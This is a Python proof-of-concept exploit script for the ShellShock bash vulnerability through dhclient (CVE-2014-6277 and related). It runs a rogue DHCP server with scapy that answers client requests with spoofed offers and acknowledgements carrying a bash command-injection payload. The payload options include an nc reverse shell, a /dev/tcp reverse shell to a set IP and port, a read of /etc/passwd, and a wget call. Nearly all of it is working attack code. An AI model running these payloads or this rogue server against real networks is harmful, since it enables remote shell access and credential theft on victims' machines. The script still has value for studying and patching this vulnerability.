#!/usr/bin/python
# Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC
# Date: 2014-09-29
# Author: @fdiskyou
# e-mail: rui at deniable.org
# Version: 4.1
# Tested on: Debian, Ubuntu, Kali
# CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187
from scapy.all import *
conf.checkIPaddr = False
fam,hw = get_if_raw_hwaddr(conf.iface)
victim_assign_ip = "10.0.1.100"
server_ip = "10.0.1.2"
gateway_ip = "10.0.1.2"
subnet_mask = "255.255.255.0"
dns_ip = "8.8.8.8"
spoofed_mac = "00:50:56:c0:00:01"
payload = "() { ignored;}; echo 'moo'"
payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777"
payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &"
payload_4 = "() { ignored;}; /bin/cat /etc/passwd"
payload_5 = "() { ignored;}; /usr/bin/wget http://google.com"
rce = payload_5
def toMAC(strMac):
cmList = strMac.split(":")
hCMList = []
for iter1 in cmList:
hCMList.append(int(iter1, 16))
hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5])
return hMAC
def detect_dhcp(pkt):
# print 'Process ', ls(pkt)
if DHCP in pkt:
# if DHCP Discover then DHCP Offer
if pkt[DHCP].options[0][1]==1:
clientMAC = pkt[Ether].src
print "DHCP Discover packet detected from " + clientMAC
sendp(
Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
IP(src=server_ip,dst="255.255.255.255")/
UDP(sport=67,dport=68)/
BOOTP(
op=2,
yiaddr=victim_assign_ip,
siaddr=server_ip,
giaddr=gateway_ip,
chaddr=toMAC(clientMAC),
xid=pkt[BOOTP].xid,
sname=server_ip
)/
DHCP(options=[('message-type','offer')])/
DHCP(options=[('subnet_mask',subnet_mask)])/
DHCP(options=[('name_server',dns_ip)])/
DHCP(options=[('lease_time',43200)])/
DHCP(options=[('router',gateway_ip)])/
DHCP(options=[('dump_path',rce)])/
DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
)
print "DHCP Offer packet sent"
# if DHCP Request than DHCP ACK
if pkt[DHCP] and pkt[DHCP].options[0][1] == 3:
clientMAC = pkt[Ether].src
print "DHCP Request packet detected from " + clientMAC
sendp(
Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/
IP(src=server_ip,dst="255.255.255.255")/
UDP(sport=67,dport=68)/
BOOTP(
op=2,
yiaddr=victim_assign_ip,
siaddr=server_ip,
giaddr=gateway_ip,
chaddr=toMAC(clientMAC),
xid=pkt[BOOTP].xid
)/
DHCP(options=[('message-type','ack')])/
DHCP(options=[('subnet_mask',subnet_mask)])/
DHCP(options=[('lease_time',43200)])/
DHCP(options=[('router',gateway_ip)])/
DHCP(options=[('name_server',dns_ip)])/
DHCP(options=[('dump_path',rce)])/
DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1"
)
print "DHCP Ack packet sent"
def main():
#sniff DHCP requests
sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1")
if __name__ == '__main__':
sys.exit(main())